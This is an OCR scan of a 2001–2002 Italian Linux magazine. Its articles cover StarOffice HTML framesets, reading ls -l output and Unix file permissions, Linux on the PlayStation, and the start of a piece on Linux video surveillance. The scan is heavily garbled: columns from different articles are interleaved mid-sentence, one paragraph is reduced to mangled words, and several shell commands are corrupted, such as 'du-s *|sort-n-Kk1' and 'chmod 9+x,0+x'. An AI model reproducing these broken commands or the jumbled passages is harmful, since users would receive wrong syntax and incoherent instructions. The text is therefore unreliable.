gna inserire il percorso Diamo uno sguardo al 


How To 


Appunti Linux 


Figura 5 


Selezione della barra strumenti hyperlink 
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modello predefinito di 
StarOffice: HTML.vor. Lo 
troviamo nella directory 
office52/share/template/it 
alian/internal/ (per la 
versione in italiano). Esso 
fornisce la corrispondenza 
fra gli stili definiti nel 
modello ed i 
corrispondenti tag HTML 
(Figura 10). 

Per cambiare tipo di 
carattere al modello è 
sufficiente andare su 
Menù-Strumenti-Opzioni- 
Documento di testo- 
Caratteri standard, mentre 
si può usare lo Stilista 
(Menù-Formato_ Stilista) 


Inserimento di un link su internet. 


per la gestione degli stili. 
Vale la pena ricordare 
l'uso di un prezioso 
strumento che è il 
Navigatore, selezionabile 
da Menù-Modifica- 
Navigatore. Esso 
visualizza tutte le 
componenti strutturali del 
documento: intestazioni, 
tabelle, link. 

Consente una rapida 
modifica dell'elemento 
del documento 
selezionato e permette di 
cambiare l'ordine 
gerarchico in cui paragrafi, 


tabelle, etc. sono 
presentati. 


Tabelle 


Le tabelle possono essere 
utilizzate come normali 
tabelle di testo, però 
anche come struttura per 
ordinare nel documento 
elementi ordinati che 
possono essere link 
oppure immagini, come 
nel caso del documento 
di esempio (Figura 11). 

In questo caso i bordi 
delle tabelle sono visibili 
nel layout di 


visualizzazione ma sono 
impostate con bordi 
trasparenti solo per 
disporre convenientemen- 
te testo ed immagini. 

Per l'inserimento della 
tabella spostarsi su Menù- 
Inserisci-Tabella e 
comparirà la pop-up 
mostrata in Figura 12. 
Viene inserito il nome 
della tabella, che sarà poi 
visibile dal navigatore, il 
numero di righe e 
colonne, ed alcune 
opzioni: selezione 
presenza 


dell'intestazione, 
presenza del bordo, 
oppure la formattazione 
automatica secondo 
alcuni modelli disponibili. 


Uso dei frame 
Una volta acquisite le basi 
dell'editing HTML, 
passiamo a qualcosa di 
più interessante e che 
può rendere le nostre 
pagine più accattivanti: i 
frame. Letteralmente 
frame si può tradurre 
come 'struttura', e difatti 
un frame HTML non è 
altro che una struttura in 
cui viene visualizzato un 
documento HTML. Il 
contenitore di tutto è il 
frameset: un insieme di 
frame disposto per righe 
e colonne. Di 
conseguenza in un 
frameset vengono 
visualizzate più pagine 
contemporaneamente. 

Di seguito viene spiegato 
come creare e modificare 
un frameset e la modifica 
dei documenti contenuti 
nei suoi frame utilizzando 
i tool di StarOffice. Ma 
prima di concludere è 
conveniente aprire 
l'HTML generato in 
quanto è comunque utile 
capire come viene 
strutturato il codice di un 
frameset ed i link sui 
frame. 


Creazione 
del frameset 


Un frameset è un 
documento HTML che 
contiene le informazioni 
sui frame in esso 
contenuti: la creazione è 
semplice: dal menù Fi/e- 


How To 


Appunti Linux 
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Le proprietà di un link si possono cambiare direttamente nella 
toolbar strumenti web. 
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Figura 8 


Link ad un documento con la posizione relativa sulla chiave 
‘EDITOR. 
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Link ad un nuovo documento: viene scelto il nome il tipo e 
quando modificarlo. 
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Nuovo-Frameset si crea 
una pagina bianca come 
qualsiasi documento. 
Utilizzando i pulsanti di 
suddivisione del frameset 
(Figura 13), ho suddiviso il 
frameset in tre zone: una 
parte superiore 
contenente la pagina con 
il titolo, una sezione 
laterali che funge da 
menù, ed un'area 
centrale. E' su quest'area 
che saranno visualizzati i 
documenti richiamati dai 
link sulla menù a sinistra. 
Per fare in modo che i link 
sul menù puntino alla 
zone centrale del 
frameset, si identifica il 
nome del frame centrale 
cliccando col tasto destro 
del mouse e selezionando 
Proprietà, quindi si 
specifica il nome del 
frame (Figura 14). 
Andiamo quindi a creare il 
link del frame sul menu: 
si può fare anche 
all'interno del frameset, 
togliendo il check a 
Modifica-Frameset, e 
andando in modifica dei 
link nella pagina di menù 
(Figura 15). Per la 
modifica del link andare 
su Modifica-Hyperlink, 
impostare nel campo 
Frame il nome del frame 
a cui puntare (nel nostro 
caso il frame ‘pagina’, ed 
il gioco è fatto. Non resta 
che salvare il tutto ed 
aprire con un browser 
qualsiasi il frameset, e... 
buona navigazione. 


Un'occhiata 
al codice 


Una breve descrizione al 
codice HTML generato 
per il frameset (Figura 
16), ed i link sulla pagina 
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Figura 10 


Corrispondenza tra stili e tag HTML. 


del menu (Figura 17): per 
il frameset la parte di 
intestazione è quella 
comune ad una qualsiasi 
pagina HTML; la definizio- 
ne delle righe e colonne 
del frameset si trova 
rispettivamente nei campi 
FRAMESET ROWS e 
FRAMESET COLS, con 
indicate le percentuali di 
spazio assegnate. Per 
quanto riguarda il conte- 
nuto, esso è racchiuso fra 
i tag FRAMESRC con le 
indicazioni delle pagine di 
riferimento. E' immediato 


{ome ] marco/oAtice52/u; 
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notare, anche dalla 
disposizione del codice 
che il nostro frameset è 
disposto su due colonne 
e che nella seconda ci 
sono due righe. Il nome 
del frame è quello eviden- 
ziato dal campo NAME. In 
Figura 16 invece notiamo 
che i tutti i link sono se- 
guiti dal campo TARGET, 
seguito dal nome del fra- 
me (‘pagina'‘)in cui visua- 
lizzare la pagina. 

Ci sono dei valori di target 
predefiniti per visualizzare 
la pagina in una nuova 
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Figura il 


Layout di modifica di un documento HTML con tabelle a bordi 
trasparenti, per la disposizione di testo ed immagini. 
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Figura 12 


Inserimento di una tabella. 


pagina esterna al 
frameset (_blank), oppure 
che ricoprono tutta la 
superficie del frameset 
(_parent). 


Conclusioni 

In questo articolo nell'illu- 
strare le capacità del tool 
HTML di StarOffice si è 
voluta dare un'indicazione 
su alcuni concetti base 
dell'HTML anche per avvi- 
cinare i neofiti assoluti, 
senza per questo fermarsi 
al banale click del mouse 


su una maschera, ma 
andando a vedere cosa 
c'è 'dietro' la creazione di 
un documento di script. 
Questo ragionamento vale 
in generale per tutti i tool 
di scripting, dall' HTML al 
LateX fino ad arrivare ai 
RAD per quanto riguarda 
la programmazione. Usare 
un tool grafico è molto 
utile per impostare il 
lavoro velocemente, ma 
vale sempre la pena 
osservare ed intervenire 
sul codice generato per 
una migliore gestione. 
Marco Giangrasso 
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HTML con StarOffice 


Quando corate dei documenti nvnvî, per l'arra HTML vengona definiti astumaticamente 
dei ndelli necesmari a creare un modelli HTML Questi modelli vengune c.nvertiti 
automaticamente nei relativi tag HTML nel momento in cui salvate nel fermani HTML 
Altri dettagli, come ad esempi il titola della pagina HTML, sengune presi dalle proprietà ‘ 
del documenta 
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Figura 13 


Frameset suddiviso in tre zone con evidenziati i pulsanti di 


suddivisione delle aree. 


Come in tutti gli articoli 
di questa serie, puoi 
provare gli esempi che 
daremo direttamente in 
una console di testo 
(prova a digitare 
<ftl>-<Alt>-<H>, 
poi digita il tuo nome 
utente e la password) 
oppure da una finestra 
di terminale, se 
preferisci lavorare in 
modalità grafica. 


Tutto 


quello che avreste sempre 
voluto sapere sui file 


(©) 
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Confuso dall'output di Is? Desideroso di muovere i primi 
passi nelle problematiche di sicurezza Linux? 
Questo articolo fa per te! 


| miglior amico 
dell'utente di un 
sistema unixoide è 
l'insostituibile /s(17): 
proponi a un appassionato 
di rinunciarvi in favore di 
una interfaccia grafica a 
icone, ti guarderà male! Il 
motivo principale è la 
grande quantità di 
informazioni che, con un 
minimo di esperienza, si 
possono tirare fuori, e la 
semplicità di effettuare 
successive elaborazioni 
concatenandone l'output 
con altri comandi (come 
discusso nel n. 12). Alla 
base di questo tipo di 
utilizzo c'è l'approfondita 
comprensione, che 
vogliamo trasmettere in 
questo articolo, dei 
dettagli visualizzati 
tramite l'opzione -/ ("ong 
listing); approfitteremo 
dell'occasione per parlare 


di alcuni comandi correlati 
con le proprietà dei file. 
Iniziamo da un estratto di 
risultato dell'esecuzione 
del comando /s -/ 

(Tabella 1). 


drwxrxrx 3 fms 


-W--r- 1 fms 
1 fms 
1 fms 
2 fms 
1 fms 
1 fms 


2 fms 


Tabella 1 


imprevedibile rispetto alle 
altre informazioni, che 
possono pertanto essere 
più facilmente disposte in 
forma tabellare. Il nome di 
un file può essere 


Desktop 
blackbox-menu 
fetchids@cgrg 


fetchmailre@cgra 


mail 
prova.txt 
nota.txt 
annotazioni 


Estratto di una esecuzione di LS-I 


Per dissezionare questo 
output conviene partire 
dalla fine, e innanzitutto 
dal nome del file. Questo 
viene riportato a fine linea 
perché di lunghezza più 


cambiato con il comando 
mv(1); ad esempio, mv 
vecchionome nuovonome. 
Ricorda però che mv 
viene usato anche per 
spostare file e directory 
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Avere nomi di file 
arbitrariamente lunghi è 
un lusso che alcuni 
sistemi operativi, che 
dovrebbero al giorno 
d'oggi avere solo 
rilevanza storica, hanno 
scelto di evitare. Così, 
MS-DOS imponeva un 
limite massimo di otto 
(!) caratteri per la 
lunghezza dei "nomi", ma 
poi consentiva l'aggiunta 
di una "estensione" di tre 
caratteri, che tra l'altro 
codificava il tipo di file: 
.TXT per il file di testo, 
.BAT per gli script di 
sistema, .EXE per gli 
eseguibili, e così via. 
Ovviamente, cambiare 
l'estensione di un file 
era una ricetta per il 
disastro! | sistemi 
unixoidi hanno invece 
sempre avuto una 
Struttura "piatta" per i 
nomi dei file: una parte 
finale separata con un 
punto dal resto del 
nome era possibile, ma 
non veniva trattata in 
maniera speciale dal 
sistema operativo. 
Windows ha scelto una 
via intermedia: il nome 
Può contenere un 
numero arbitrario di pun- 
ti, ma la parte finale 
viene comunque trattata 
in maniera speciale, per 
riconoscere il tipo di file. 
Nei sistemi Gnu/Linux, 
questo tipo di soluzione 
è utilizzata nei "desktop 
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Che cos'è questo file? 


environment" Gnome e 
KDE, mentre il kernel 
tratta il nome del file 
come una stringa di ca- 
ratteri arbitraria. 

Il comando file(1) tenta 
di fornire quante più 
notizie possibili su un 
file. Innanzitutto, viene 
verificato se si tratta di 
un file speciale: un link 
simbolico, un device, 
eccetera. Se si tratta di 
file normale, vengono 
cercate sequenze 
particolari in punti 
predefiniti per tentare di 
capire di che file si 
tratta; l'esempio classico 
è quello dei file 
eseguibili, ma gli esempi 
di questo tipo sono 
innumerevoli (ed 
elencati in /usr/share/ 
misc/magic). Infine, se si 
tratta di un file normale 
non riconosciuto tramite 
quest'ultima tecnica, il 
comando prova a ricono- 
scere altri dettagli dal 
testo in esso contenuto. 
Se volete vedere che 
tipi di file ci sono sul 
vostro sistema, provate 


il seguente comando: 


find / -printO | xargs 
-0 file | sort KR | 
uniq -f 1 | less 


Incidentalmente, questo 
è un buon esercizio di 
cui capire il significato, 
con l'aiuto dell'articolo 
del n. 12 e delle pagine 
di manuale. 


all'interno di un'altra 
directory; questo avviene 
se l'ultimo argomento del 
comando è una directory 
esistente. In caso 
contrario, il comando 
deve obbligatoriamente 
avere due argomenti, e 
agisce come un cambio di 
nome. Nel caso 
dell'output precedente, ad 
esempio, mv nota.txt 
nota2.txt cambierà il 
nome del file; mv 
prova.txt nota.txt 
cambierà nome 
sovrascrivendo il 
preesistente nota.txt; mv 
prova.txt annotazioni 
sposterà il file nella 
directory; infine, mv 
prova.txt nota.txt 
annotazioni sposterà due 
file nella directory. 


Data e ora 


Subito prima del nome 
del file viene indicato 
l'istante dell'ultima 
modifica effettuata (ma 
può anche essere 
richiesto l'istante 
dell'ultimo utilizzo, tramite 
l'opzione -u, o quella 
dell'ultimo cambiamento 
di attributi, tramite 
l'opzione -c). 

Per i file più vecchi di sei 
mesi viene indicato 
l'anno, per gli altri l'ora; è 
possibile comunque 
utilizzare l'opzione —-full- 
time per avere tutte le 
informazioni -al costo, 
naturalmente, di una 
maggiore larghezza delle 
linee di output. || 
comando touch(1) 
permette di modificare gli 
istanti di accesso e di 
modifica di un file. 
Tornando all'esempio di 


cui sopra, il comando 
touch prova.txt aggiornerà 
l'orario a quello attuale; 
mentre il comando touch 
-t 203411020000.03 
prova.txt aggiornerà data 
e ora a tre secondi dopo 
la mezzanotte del due 
novembre 2034 (le date 
future, naturalmente, 
sono perfettamente 
consentite). 

Il formato della stringa 
relativa a data e ora, 
riportato nella pagina di 
manuale, illustra un 
importante principio 
generale, l'utilizzo delle 
parentesi quadre per 
indicare parti opzionali: 


-t orario 


Usa l'orario specificato 
come nuovo valore per gli 
orari da cambiare. 
L'argomento è un numero 
decimale della forma 


[[SS]AA]MMGGoomm[.ss] 


con l'ovvio significato. 

La parte che non è 
compresa in parentesi, 
MMGGoomm, è 
obbligatoria. La parte che 
segue, relativa ai secondi, 
è opzionale, come pure 
quella iniziale relativa 
all'anno; questo può 
essere indicato con due 0 
con quattro cifre. Se vuoi 
giocare con questo 
comando, scoprirai presto 
che su un sistema a 32 
bit non puoi dare una data 
e un'ora successiva alle 
4:14.07 del 19 gennaio 
2038: 


$ touch -t 3801190414.07 
prova.txt 

$ touch -t 3801190414.08 
prova.txt 

touch: invalid date format 


‘3801190414.08' 


Data e ora, in effetti, sono 
memorizzate come il 
numero di secondi 
trascorsi dalla mezzanotte 
di Capodanno del 1970. 
Se ti preoccupa quello 
che accadrà fra poco 
meno di 37 anni, puoi 
rilassarti: per quanto sia 
difficile prevedere il futuro 
nel campo deil'informa- 
tica, si può presumere 
che per allora utilizzeremo 
esclusivamente sistemi a 
64 bit, il che ci darà un 
po' di respiro per... uhm... 
292 miliardi di anni, o giù 


Figura 1 


Rapporto tra albero dei file e filesystem: in rosso e blu due 


di lì! Se si "tocca" un file 
inesistente, questo verrà 
creato; così, il comando 
touch nomefile è la 
maniera più rapida di 
creare al volo un file 
vuoto (echo > nomefile si 
avvicina abbastanza, ma 
richiede una battuta in più 
e crea un file contenente 
un singolo carattere di 
fine linea!) 


Spazi 
e dimensioni 


Subito prima di data e ora 


filesystem montati all'interno dell'albero dei file di un sistema 


GNU/Linux. 


viene riportata la 
dimensione del file, in 
byte. Nota che questa è la 
dimensione effettiva, che 
in generale non 
corrisponde allo spazio 
occupato. Lo spazio disco 
può essere allocato solo 
in blocchi, la cui 
dimensione varia da 1a 4 
kB, a seconda della 
formattazione del file 
system; pertanto, un file 
contenente un singolo 
carattere ha una 


$ df 
Filesystem ‘1k-blocks Used 


/dev[hda2 2403452 
/dev/hda5 885780 
/devhda6 9614116 


804412 
246216 
759900 


Tabella 2 
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tutti i file, directory e 
sottodirectory. Se si 
utilizza l'opzione -s, per le 
directory viene 
visualizzato lo spazio 
totale, comprensivo di 
tutto il loro contenuto. 
Applicazioni ripetute di 
questo comando, magari 
in combinazione con il 
comando sort(1) per 
comodità, permettono di 
rintracciare dove si 
trovano i file che 
consumano spazio disco: 


Available —Use% 
1476948 36% 
2492976 9% 
8365844 9% 


Mounted on 


Esecuzione del comando df 


dimensione di un byte, 
ma occupa un blocco 
intero, mentre un file di 
1025 caratteri occupa 
almeno due kB, e forse 
anche 4. 

Questi sprechi sono 
caratteristici dei fileystem 
a blocchi, come il classico 
ext2 in Linux e fat in 
Windows; ma con la 
versione 2.4 del kernel di 
Linux, o con delle patch 
sulle versioni 2.2, è 
possibile utilizzare il 
filesystem reiserfs, che 
permette di sfruttare fino 
all'ultimo byte lo spazio 
disco! Lo spazio 
effettivamente occupato 
da un file, in kB, può 
essere ottenuto tramite il 
comando du nomefile. || 
comando du(1) è molto 
generale; senza 
argomenti, esso viene 
applicato ricorsivamente a 


$ du-s *|sort-n-Kk1 


5044 


debs 
5452 doc 
5992 .e-conf 
9032 .-kde 
16248 projects 
37500 Mail 
99688 images 
167716 LM 
$ cd LM 


$ du -s * | sort-n-k 1 


15348 


numero13 
24236 numero8 
87416 numero10 


Un altro comando utile 
legato alla gestione dello 
spazio disco è df(1), che 
indica lo spazio totale 
occupato su un 
filesystem. Per 
comprendere bene la 
differenza tra i numeri 
forniti dai due comandi, 
devi ricordare che nei 


0000 
0000 


ombre 2001/Gennaio 2002 ® @ 08 
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sistemi unixoidi tutti i 
dispositivi fanno parte di 
uno stesso albero di file e 
directory; all'interno di 
questo, possono essere 
"innestati" diversi 
filesystem (Figura 1). Il 


Figura 2 


Trasformazione di un permesso dalla forma simbolica alla forma 


numerica. 


comando du attraversa 
tutti i filesystem (a meno 
che non gli si fornisca 
l'opzione -x), mentre df 
riporta lo spazio occupato 
da ciascun filesystem. 
Ecco il risultato 
dell'esecuzione di df su 
un sistema come quello 
mostrato in Tabella 2. 

Lo spazio mostrato in 
corrispondenza della 
partizione /dev/hda2 su 
cui è montato il root 
filesystem si riferisce solo 
alla porzione dell'albero 
delle directory che in 
figura appare in nero; le 
altre due linee si 
riferiscono alle sezioni in 
blu e in rosso, 
rispettivamente. 
Notiamo anche che du 


0000 
00009 


00 
7200 Dicembre 2001/Gennaio 2002 


non tiene conto di 
informazioni 
"amministrative" 
specifiche dei filesystem 
(in ext2, ad esempio, 
dello spazio occupato dal 
"superblocco"e dalle sue 


copie), per cui riporta 
un'occupazione 
leggermente inferiore: 


$ du -Sx / 
804396 / 


Utenti e gruppi 
| due campi che 
precedono la dimensione 
del file indicano il 
proprietario e il gruppo di 
appartenenza del file. 
All'interno del file queste 
informazioni sono 
codificate in forma 
numerica, e l'associazione 
con le rispettive stringhe 
descrittive viene 
effettuata tramite i file di 


sistema /etc/passwd e 
/etc/groups. Nell'output 
che abbiamo riportato, ad 
esempio, si può notare la 
presenza di un file 
appartenente al gruppo 
"508", non presente in 
/etc/groups; 
probabilmente un residuo 
dell'utilizzo della mia 
home directory in una 
differente distribuzione. 
Gli strumenti per la 
creazione di utenti e 
gruppi, da parte 
dell'utente root, può 
avvenire basilarmente con 
quattro modalità: 


e manualmente (si 
modificano 
manualmente i file 
/etc/passwd e 
/etc/groups, se 
necessario si crea la 
home directory 
dell'utente, 
eventualmente con 
alcuni file di 
inizializzazione); 


e tramite il comando 
useradd(8), che 
modifica i file, crea la 
home directory e vi 
copia i file di 
inizializzazione trovati in 
/etc/skel; 


® tramite script come 
adduser(8) e 
addgroup(8), che 
costituiscono un front- 
end semplificato; 


© tramite un'interfaccia 
grafica. 


Ciascun utente appartiene 
a uno o più gruppi, uno 
dei quali è il suo gruppo 
iniziale, cioè quello con 
cui effettua il login e cui 
vengono attribuiti i nuovi 
file creati. Il comando 


usermod(8) permette di 
modificare queste 
informazioni: con 
l'opzione -g per il gruppo 
iniziale, e -G per i gruppi 
addizionali. 

E' possibile modificare 
l'utente e il gruppo 
proprietario del file 
tramite i comandi 
chown(1)e chgrp(1). Il 
primo permette 
comunque di specificare 
sia utente che gruppo, 
separandoli tramite un 
punto; per entrambe i 
comandi è preziosa 
l'opzione -R}, che ne 
consente l'applicazione 
ricorsiva a una directory; 
ad esempio, per rimettere 
a posto la directory con 
un gruppo di proprietà 
inesistente si può 
utilizzare l'uno o l'altro dei 
seguenti comandi: 


$ chgrp -R users Desktop 
$ chown -R fms.users 


Naturalmente, un utente 
può solo modificare il 
gruppo di appartenenza dei 
suoi file; per altre 
operazioni occorre agire 
come root. 


Autorizzazioni 
Nei sistemi unixoidi, 
come dice uno dei più 
diffusi adagi, ogni risorsa 
è un file. Rispetto alle 
azioni che su un file si 
possono compiere, 
esistono tre categorie di 
utenti: il proprietario, il 
gruppo di appartenenza, e 
il resto del Mondo. 
Ciascuno di questi tre 
gruppi può compiere tre 
azioni: leggere dati dal file 
(o dalla risorsa, che dir si 


Root o non root, questo 
è il dilemma... 


È buona abitudine non 
abusare dell'account 
root, e utilizzarlo solo 
quando necessario; allo 
stesso tempo, non è 
opportuno "abbondare" 
con i permessi attribuiti 
ai file, soprattutto su 
una macchina comune- 
mente raggiungibile via 
rete. Questo tipo di pro- 
blema è in genere risol- 
to tramite l'utilizzo dei 
gruppi. Così, ad esem- 
pio, se con un normale 
account non riuscite a 
utilizzare il CD-ROM, 
potete vedere a quale 
gruppo appartiene la 
risorsa, e quindi inserire 
la vostra utenza in quel 
gruppo: 


$ ls -1/dev/edrom 
lrwxrwxrwx 1 root root 
Ss Jun 22 17:23 
/dev/cdrom -> hdc 


$ ls -1/dev/hdce 


voglia); scrivere dati; 
mandare in esecuzione il 
file - se si tratta di un 
eseguibile, ovviamente. 
Del gruppo iniziale di dieci 
caratteri di ciascuna riga 
di output di /s -/, il primo 
indica il tipo di file, i 
successivi nove si 
riferiscono alle 
autorizzazioni appena 
discusse. Le lettere ‘r‘, 
'w'ed 'x'indicato 


brw-rw---- 1 root disk 
22, O May 12 19:34 
/dev/hde 


$ su -c 'usermod -G 
disk fms' 
Password: 


La struttura per cui le 
diverse categorie di 
risorsa sono attribuiti a 
diversi gruppi è abbon- 
dantemente utilizzate in 
tutte le distribuzioni. Per 
le normali utenze, inve- 
ce, ci sono due strategie 
base: un gruppo per cia- 
scuna utenza, con lo 
stesso nome dell'utente 
(stile Red Hat); oppure 
un unico gruppo users 
per tutti gli utenti. Ov- 
viamente, l'amministra- 
tore di sistema è 
comunque libero di defi- 
nire la propria personale 
politica, magari grazie a 
un piccolo insieme di 
shell script. 


rispettivamente i 
permessi di lettura (read), 
scrittura (write) ed 
esecuzione (execute); se 
la lettera è presente, 
l'operazione è consentita, 
altrimenti è vietata. La 
classica sequenza "-rwxr- 
Xr-X", ad esempio, indica 
che il proprietario del file 
può modificare, leggere e 
mandare in esecuzione il 
file, mentre tutti gli altri 


utenti, 
indipendentemente dal 
gruppo, possono solo 
leggerlo ed eseguirlo. 

Per quanto riguarda la 
codifica del tipo di file, 
invece, ‘d'indica una 
directory, ‘'/' un 
collegamento simbolico o 
link (in questo caso 
assieme al nome del file 
viene indicato a quale file 
il link punta; provate ad 
esempio il comando /s -/ 
/etc/re2.d/, 'b'e la ‘c'i 
dispositivi a blocchi e a 
caratteri (esempio: /s -/ 
/dev | less), ‘p' le 
cosiddette named pipe - 
file speciali per la 
comunicazione tra | 
processi-, ed 's'i socket, 
usati per la 
comunicazione di processi 
tra macchine connesse in 
rete. 

Ulteriori bit sono 
associati, più raramente, 
ai permessi di 
esecuzione, e quindi 
mostrati da /s con una 
lettera diversa dalla ‘x'. La 
‘s'indica che sul file è 
configurato il permesso 
"setuid' o "setgid': il file 
non solo può essere 
eseguito, ma il 
corrispondente processo 
possiede i diritti di 
accesso dell'utente o del 
gruppo proprietario del 
file (questa opzione è in 
genere considerata un 
rischio per la sicurezza). 
La "?' indica che il file è 
configurato come "sticky', 
cioè verrà conservato sul 
dispositivo di swap per un 
accesso più rapido. 

| permessi possono 
essere modificati 
attraverso il comando 
chmod(1), che può essere 
eseguito sotto due forme. 
Nella prima, si configura 


Consumer 


un bit di autorizzazione 
per volta, indicando 
dapprima una lettera 
corrispondete alla 
categoria di utente ('u’' 
per l'utente proprietario, 
‘g' per il gruppo, ‘o’ per 
tutti gli altri other), poi il 
carattere '+'o ‘'a 
seconda che il permesso 
debba essere concesso o 
negato, e infine la lettera 
fr w, x corrispondente al 
tipo di accesso. Si 
possono anche indicare 
più bit di accesso, 
separandoli con una 
virgola; il comando chmod 
9+x,0+x file, ad esempio, 
concede il diritto di 
esecuzione al gruppo di 
appartenenza e a tutti gli 
utenti. 

La seconda forma indica 
con un unico argomento 
tutti i permessi. A 
ciascuna categoria di 
accesso viene fatta 
corrispondere una cifra, e 
ciascuna cifra viene 
considerata come una 
sequenza di tre bit 
corrispondenti ai tre tipi di 
permesso. 

Chi conosce bene la 
numerazione binaria si 
troverà a proprio agio con 
questo tipo di notazione; 
gli altri possono ricordare 
che rw, e x 
corrispondono 
rispettivamente a 4, 2 e 
1, ed effettuare le 
somme. 

La familiare stringa di 
permessi rWxr-Xr-X, 
caratteristica di 
programmi o script 
liberamente acessibili in 
lettura ed esecuzione, 
può essere quindi fornita 
tramite il comando chmod 
755 file. 


Francesco Marchetti Stasi 
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Che cosa centra Linux 
con le diffusissime 
console della Sony? In 
questo articolo 
parleremo di un toolkit 
recentemente rilasciato 
da Sony : Linux Kit è 
composto da un DVO- 
Rom contenente “Linux 
for PS2" in versione 
Beta 1, un hard disk da 
40 Gigabyte, una 
Scheda di rete Ethernet 
10/100, mouse e 
tastiera USB e un 
cavetto per monitor 
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Linux 
& Playstation 


Il Pinguino approda sulle Playstation 


a Sony giapponese, 
questa estate, ha 
iniziato la 
commercializzazione 
di un “Linux Kit” per la 
seconda generazione della 
sua fortunata console. Prima 
di farlo, però, si è accertata 
dell'interesse del pubblico 
lanciando un sondaggio sul 
suo sito web, al quale hanno 
aderito più di 6000 persone. 
Il kit consiste in un DVD- 
Rom contenente “Linux for 
PS2” in versione Beta 1, un 
hard disk da 40 Gigabyte, 
una scheda di rete Ethernet 
10/100, mouse e tastiera 
USB e un cavetto per 
monitor VGA. Il DVD-Rom 
contiene i manuali d'uso in 
formato elettronico, il PS2 
Linux Beta Release 1 Install 
Kit, Linux Kernel versione 
2.1.1, Xfree86 3.3.6, gcc 
2.95.2 e glibc 2.2.2. È inoltre 
incluso un “Playstation 2 
Runtime Environment”, che 
consente di eseguire i giochi 
Psx direttamente all'interno 
del sistema. Di quest'ultimo 
software, però, non vengono 
distribuiti i sorgenti, essendo 
propietario Sony. Il prezzo di 


vendita è di 25.000 yen, 


circa 400.000 lire. 


La Sony, come la maggior 
parte dei produttori di video 
games console, divide il 
mercato mondiale in tre 
zone differenti (Giappone, 
America, Europa), e vi 
distribuisce modelli diversi (e 


incompatibili) del suo 


hardware e software. Il 


Figura | 


Ii Linux Kit della Sony. 


i Linux Kit funziona solamente 
{ con i modelli destinati al 

| giappone, e, ufficialmente, la 
i Sony ha dichiarato che non 

i esistono piani per produrre 

| versioni americane ed 


europee del suo kit. In ogni 


| caso, sui siti web di SCEA 


(Sony Computer 


i Entertainment America) e di 
i  SCEE (Sony Computer 


Piaystationi®: 


nn “Visr/local/ss1/incluto -INNECOFI.H 
n =Iusr/local/ss1/ incluso -DINE.CONF IM 
ne Mar /local/ss1/ incluso -HNE_CONFIO.H 
n° “Iusr/local/ss1/inclute -«DNECONFIA.H 
'» “Iusr/local/ss1/inclute -<DINE_COFIN 


his 
Astipsi4 kis]$ ad > cutoad 


Il desktop su PS2. 


Entertainment Europe) di 
possono trovare le 
caratteristiche principali del 
Linux Kit giapponese, e sono 
presenti dei sondaggi per 
verificare l'interesse degli 
utenti per il kit. 


Linux for 
PSOne 


Sulla scia dell'interesse su- 
scitato dalla “distribuzione” 
Sony, una azienda della Re- 
pubblica Ceca di nome Blok- 
man Trading ha annunciato 
lo sviluppo di un port di Li- 
nux per la Playstation origi- 
nale. A differenza di Sony, 
Runix (questo il suo nome) 
sarà disponibile gratuitamen- 
te sotto le regole della Gnu 
Public License, e sarà basato 
sull'ultima versione 
disponibile del kernel, la 2.4. 
Oltre alla possibilità di usare 
un hard disk esterno, Runix 
consentirà di creare e 
montare file system sulle 
memory card (!) utilizzate 
per il salvataggio delle 
situazioni di gioco. Al 


momento si può scaricare 
(da www.runix.ru) solamente 
il sorgente del kernel e il 
cross-compilatore, cioè il 
compilatore che gira su 
architetture Intel, ma genera 
eseguibile per Playstation. | 
progetti futuri riguardano una 
distribuzione completa per 
Playstation (One) e, in 
seguito, per Playstation2. 


Playstation3 

La dn (00 generazione 
della console Sony dovrebbe 
essere basata su una 
versione speciale di Linux, 
orientata ovviamente al 
supporto dei videogames. La 
cpu della nuova console sarà 
una versione a 2 GHz del 
processore Athlon AMD. 
Alcuni membri della comuni- 
tà opensource vedono que- 
sta notizia come la possibilità 
di fronteggiare l'avanzamen- 
to di Microsoft nel settore 
dei videogames con la sua 
nuova console Xbox. Linux 
Torvalds e Jerry Sanders, 
CEO della AMD, hanno 


presenziato ad una riunione 
di sviluppatori nell'ultima 
edizione del Tokyo Game 
Show. 


Passato e futuro 


Le strade del pinguino e 
della videogame-console più 
famosa si sono già incrociate 
nel passato: Sony mise a 
disposizione delle maggiori 
software house un kit di 
sviluppo prima che la Play- 
station2 fosse effettivamen- 
te prodotta, per consentire 
loro di iniziare da subito a 
sviluppare nuovi prodotti. 
Indovinate su quale sistema 
operativo era basato il kit? 
Linux, ovviamente. Avere già 
a disposizione una distribu- 
zione ufficiale su PS2 non ha 
scoraggiato i fautori 
dell'opensource e del free 
software dal lavorare sull'ul- 
tima console nata in casa 
Sony: un progetto di nome 

" Happy Hacking PS2" 
(http://ps2hacking.sourceforg 
e.net) si propone di eseguire 
il porting del kernel versione 
2.4 e di creare una 
distribuzione Debian/PS2. 


d w a r 


Consumer 


Conclusioni 


L'avvicinarsi di due mondi 
tanto diversi, fino a qualche 
mese fa, sarebbe apparso 
come un puro sforzo di 
fantasia. La moltitudine di 
iniziative in questo senso, 
invece, hanno dimostrato 
come questo non solo sia 
possibile, ma che è seguito 
da molti con interesse. 
Certo, sarà difficile ripetere 
in Europa e nelle Americhe il 
successo che il Playstation 
Kit ha avuto in Giappone, 
dove esiste una sensibilità 
del tutto particolare verso 
questi “giocattoli 
tecnologici”. 
A suo favore bisogna dire 
che potrebbe essere un 
mezzo a basso costo per 
accostare un certo numero 
di giovane pubblico verso il 
sistema operativo del 
pinguino. 
Sicuramente i più 
“smanettoni” non vedono 
l'ora di provare le soluzioni 
free, meno immediate da 
utilizzare ma proprio per 
questo più divertenti da 
provare. 

Marcello Penna 


About The core team Projects Contacts Vacancy Download! Links Forum 


News of the company 


[19.07.2001, 14:09:25] - Biolonan 


About the company 


Dear visitor. 


welcome to cur site! Wee very glad, Mat you have decided to visit cur web- site 
We hope that youli find it useful and cuficient for your purposes and goal: Our 
team has tried to make your navigation through our wab-site simple and pleasant 
Pieaso find below a short introduction to our team 


Our company works in Ihe area cf computer technology and offers complex solutioni 
for various tovels of complexsty and functionality, working wiîh equipment used all 


over the world 


Figura 2 


Home page del sito Runix. 


coeo 
0000 


CI 
l»;cembre 2001/Gennao 2002 0075 


Telesorvaglianza, 


on Linux 


Vediamo di mettere insieme una serie di concetti 
più o meno familiari per ottenere dal nostro 
sistemo operativo una funzionalità interessante e 


metteremo a frutto 

alcune caratteristiche 
del sistema operativo 
Linux analizzate in 
momenti diversi sulla 
nostra rivista che 
mettono in evidenza 
come il principale punto 
di forza di Linux sia la 
modularità. Questa 
caratteristica ci permette, 
avendo acquisito una 


n questo articolo 


Figura | 


L'architettura del nostro servizio di telesorveglianza. 
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certa padronanza con 
